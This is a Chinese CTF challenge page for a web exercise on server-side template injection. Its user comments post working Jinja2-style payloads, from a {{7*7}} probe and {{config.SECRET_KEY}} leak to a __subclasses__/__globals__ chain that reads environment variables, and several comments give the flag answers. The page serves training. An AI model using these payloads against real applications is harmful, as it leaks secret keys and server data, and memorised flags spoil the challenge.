Simple_SSTI_1WEB 未解决

分数: 5 金币: 2
题目作者: valecalida
一  血: dotast
一血奖励: 2金币
解  决: 28452
提  示:
描  述:
Simple_SSTI_1
评论
cfggfbfxdgbb 15天前

?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['environ']}}

回复 0

LeoCHAn 3月前

flag{********}

回复 0

merrymu 5月前

模板注入(Server-Side Template Injection,SSTI)是一种通过将恶意代码注入服务器端模板来执行非授权操作的安全漏洞‌,主要成因是开发者未对用户输入进行有效过滤,导致攻击者可利用模板引擎特性实现远程代码执行、敏感信息泄露等高危操作。‌‌‌‌ 基本探测:输入{{2*2}},若返回4则存在漏洞。‌‌

回复 0

HK1ng 8月前

还真是简单模板注入,甚至不需要利用方法,首先传参{{7*7}}验证是否执行了语句,看到页面出现49,就知道这里存在模板注入,然后查看一下配置文件,就发现了flag。{{config}}

回复 0

看writeup刷题 8月前

咋SECRET_KEY还必须大写

回复 0

Wang_Micro 1年前

?flag={{config.SECRET_KEY}} flag{4c1f57d8ba21815847e7d477c3c86b81}

回复 0

超爱西西鸭 1年前

/?flag={{config.SECRET_KEY}}

回复 1

yanglegeyang 1年前

flag{727f54cccaa9c031b1a7c029dd2eb7d8}

回复 0

F0xyear 1年前

不太懂这个漏洞啊,有没有大佬指导一下

回复 1
17856716923 1年前

这个应该要去学下编程语言,模版好像是基于语言的,我去搜了答案都没看懂只能照抄

回复 0

SwanPrincess 1年前

flag{208dea064bf2ad965ef8964289b32005}

回复 0

WriteUp

image
valecalida

5 金币

评分(50)

解题动态

白菜白又白 攻破了该题 12小时前
3381328748 攻破了该题 1天前
66666ctfxr 攻破了该题 1天前
Zhengzanmei 攻破了该题 1天前
qsy 攻破了该题 1天前
不知道不晓得 攻破了该题 1天前
邪恶的番茄 攻破了该题 1天前
Fbug 攻破了该题 1天前
ixin 攻破了该题 1天前
minz 攻破了该题 1天前
353866147 攻破了该题 2天前
DKQ666666 攻破了该题 2天前
18394165790 攻破了该题 2天前
顾无澜 攻破了该题 3天前
out不慢 攻破了该题 3天前
xiaodd 攻破了该题 4天前
zhy2006 攻破了该题 6天前
南京交通第一深情徐立超 攻破了该题 6天前
爱睡觉的鱼 攻破了该题 7天前
蛋蛋 攻破了该题 8天前
问题反馈